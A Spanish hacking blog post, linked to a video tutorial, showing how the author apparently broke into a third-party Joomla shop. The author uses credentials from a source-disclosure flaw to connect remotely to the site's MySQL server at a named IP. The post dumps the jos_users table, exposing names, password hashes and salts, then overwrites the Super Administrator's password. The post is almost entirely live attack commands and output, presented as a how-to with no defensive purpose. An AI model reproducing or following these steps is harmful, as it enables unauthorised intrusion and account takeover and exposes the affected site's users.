En este post os mostraré un vídeo-tutorial mío explicado en Inglés.
En el tutorial os muestro cómo penetrar una website que usa Joomla mediante la vulnerabilidad Full Source Disclosure e intencionalmente conectarnos remotamente al servidor mysql para cambiar la clave del administrador en la base de datos (Nada de phpmyadmin).
A continuación os dejaré el vídeo y más abajo la fuente.
_ _ _ _
(_) ___ ___ _ __ ___ | | __ _ | |__ __ _ ___| | __
| |/ _ \ / _ \| '_ ` _ \| |/ _` | | '_ \ / _` |/ __| |/ /
| | (_) | (_) | | | | | | | (_| | | | | | (_| | (__| <
_/ |\___/ \___/|_| |_| |_|_|\__,_| |_| |_|\__,_|\___|_|\_\
|__/
###########################################################
# [VideoTuT] > https://youtu.be/XUlKGsjiqGI #
# [Blog] > http://blog.veneno.ovh #
# [FB] > http://fb.me/veneno.uk #
###########################################################
Process >
root@machine:~# mysql -u publish123 -p -h 202.181.134.138
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 61526
Server version: 5.0.51a-24+lenny5 (Debian)
Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| publishinghouse |
+--------------------+
2 rows in set (0.22 sec)
mysql> use publishinghouse
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-------------------------------------+
| Tables_in_publishinghouse |
+-------------------------------------+
| jos_acajoom_lists |
| jos_acajoom_mailings |
| jos_acajoom_queue |
| jos_acajoom_stats_details |
| jos_acajoom_stats_global |
| jos_acajoom_subscribers |
| jos_acajoom_xonfig |
| jos_banner |
| jos_bannerclient |
| jos_bannertrack |
| jos_catalogue |
| jos_categories |
| jos_chrono_contact |
| jos_chrono_contact_elements |
| jos_chrono_contact_emails |
| jos_chrono_contact_plugins |
| jos_components |
| jos_contact_details |
| jos_contact_us |
| jos_contact_us_ar |
| jos_content |
| jos_content_frontpage |
| jos_content_rating |
| jos_core_acl_aro |
| jos_core_acl_aro_groups |
| jos_core_acl_aro_map |
| jos_core_acl_aro_sections |
| jos_core_acl_groups_aro_map |
| jos_core_log_items |
| jos_core_log_searches |
| jos_csvivirtuemart_available_fields |
| jos_csvivirtuemart_currency |
| jos_csvivirtuemart_log_details |
| jos_csvivirtuemart_logs |
| jos_csvivirtuemart_replacements |
| jos_csvivirtuemart_settings |
| jos_csvivirtuemart_template_fields |
| jos_csvivirtuemart_template_types |
| jos_csvivirtuemart_templates |
| jos_custom_quickicons |
| jos_dbcache |
| jos_ebooks |
| jos_ebooks_items |
| jos_groups |
| jos_gwcoupons |
| jos_gwcoupons_log |
| jos_gwcoupons_vm |
| jos_jf_content |
| jos_jf_tableinfo |
| jos_languages |
| jos_menu |
| jos_menu_types |
| jos_messages |
| jos_messages_cfg |
| jos_migration_backlinks |
| jos_modules |
| jos_modules_menu |
| jos_newsfeeds |
| jos_osemsc_acl |
| jos_osemsc_content_basic |
| jos_osemsc_content_ext |
| jos_osemsc_ext |
| jos_osemsc_member |
| jos_osemsc_member_credits |
| jos_osemsc_member_exp |
| jos_osemsc_member_ips |
| jos_osemsc_orders |
| jos_osemsc_payment_methods |
| jos_plugins |
| jos_poll_data |
| jos_poll_date |
| jos_poll_menu |
| jos_polls |
| jos_request_catalogue |
| jos_sections |
| jos_sefexts |
| jos_sefexttexts |
| jos_sefmoved |
| jos_sefurls |
| jos_session |
| jos_stats_agents |
| jos_templates_menu |
| jos_users |
| jos_vm_auth_group |
| jos_vm_auth_user_group |
| jos_vm_auth_user_vendor |
| jos_vm_cart |
| jos_vm_category |
| jos_vm_category_xref |
| jos_vm_country |
| jos_vm_coupons |
| jos_vm_creditcard |
| jos_vm_csv |
| jos_vm_currency |
| jos_vm_export |
| jos_vm_function |
| jos_vm_manufacturer |
| jos_vm_manufacturer_category |
| jos_vm_module |
| jos_vm_order_history |
| jos_vm_order_item |
| jos_vm_order_payment |
| jos_vm_order_status |
| jos_vm_order_user_info |
| jos_vm_orders |
| jos_vm_payment_method |
| jos_vm_product |
| jos_vm_product_attribute |
| jos_vm_product_attribute_sku |
| jos_vm_product_bk_08_july_2010 |
| jos_vm_product_category_xref |
| jos_vm_product_discount |
| jos_vm_product_download |
| jos_vm_product_files |
| jos_vm_product_mf_xref |
| jos_vm_product_price |
| jos_vm_product_product_type_xref |
| jos_vm_product_relations |
| jos_vm_product_reviews |
| jos_vm_product_series |
| jos_vm_product_type |
| jos_vm_product_type_1 |
| jos_vm_product_type_2 |
| jos_vm_product_type_parameter |
| jos_vm_product_votes |
| jos_vm_shipping_carrier |
| jos_vm_shipping_label |
| jos_vm_shipping_rate |
| jos_vm_shopper_group |
| jos_vm_shopper_vendor_xref |
| jos_vm_state |
| jos_vm_tax_rate |
| jos_vm_user_info |
| jos_vm_userfield |
| jos_vm_userfield_values |
| jos_vm_vendor |
| jos_vm_vendor_category |
| jos_vm_waiting_list |
| jos_vm_zone_shipping |
| jos_weblinks |
+-------------------------------------+
140 rows in set (0.23 sec)
mysql> SELECT * FROM jos_users;
+----+----------------+----------+---------------------------------------+-------------------------------------------------------------------+---------------------+-------+-----------+-----+---------------------+---------------------+----------------------------------+----------------------------------------------------------+
| id | name | username | email | password | usertype | block | sendEmail | gid | registerDate | lastvisitDate | activation | params |
+----+----------------+----------+---------------------------------------+-------------------------------------------------------------------+---------------------+-------+-----------+-----+---------------------+---------------------+----------------------------------+----------------------------------------------------------+
| 62 | Sanjay Chauhan | admin | [email protected] | f81f10e631f3c519d5a44d8da976fb67 | Super Administrator | 0 | 0 | 25 | 2010-02-20 11:57:06 | 2015-06-06 17:36:52 | | admin_language=
language=
editor=
helpsite=
timezone=0
|
| 63 | sunil | sunil | [email protected] | 45fb29b220d369824d44924afdca4e95:LGFd32RJw51BUkLNCwchIpIU2lMqiul1 | Super Administrator | 0 | 0 | 25 | 2010-01-19 07:06:45 | 2010-03-13 13:37:47 | | admin_language=
language=
editor=
helpsite=
timezone=0
|
| 66 | Sanjay Chauhan | sanjay | [email protected] | d29cb8dbd7535eeb848603316846f362:tyyWislIes7OM9mMpsXJKCdhPNHMOmAL | Administrator | 0 | 0 | 24 | 2010-02-20 09:30:56 | 2010-04-16 17:26:07 | 6d4be54b5f5a726425cbb7a7e7870794 | language=
timezone=0
admin_language=
editor=
helpsite=
|
+----+----------------+----------+---------------------------------------+-------------------------------------------------------------------+---------------------+-------+-----------+-----+---------------------+---------------------+----------------------------------+----------------------------------------------------------+
3 rows in set (0.22 sec)
mysql> show columns from jos_users;
+---------------+---------------------+------+-----+---------------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+---------------+---------------------+------+-----+---------------------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| name | varchar(255) | NO | MUL | | |
| username | varchar(150) | NO | MUL | | |
| email | varchar(100) | NO | MUL | | |
| password | varchar(100) | NO | | | |
| usertype | varchar(25) | NO | MUL | | |
| block | tinyint(4) | NO | | 0 | |
| sendEmail | tinyint(4) | YES | | 0 | |
| gid | tinyint(3) unsigned | NO | MUL | 1 | |
| registerDate | datetime | NO | | 0000-00-00 00:00:00 | |
| lastvisitDate | datetime | NO | | 0000-00-00 00:00:00 | |
| activation | varchar(100) | NO | | | |
| params | text | NO | | NULL | |
+---------------+---------------------+------+-----+---------------------+----------------+
13 rows in set (0.23 sec)
mysql> update jos_users set password='35393c24384b8862798716628f7bc6f4' where username='admin'
-> ;
Query OK, 1 row affected (0.23 sec)
Rows matched: 1 Changed: 1 Warnings: 0
Fuente (http://blog.veneno.ovh/2015/06/hackeando-joomla-full-source-disclosure.html)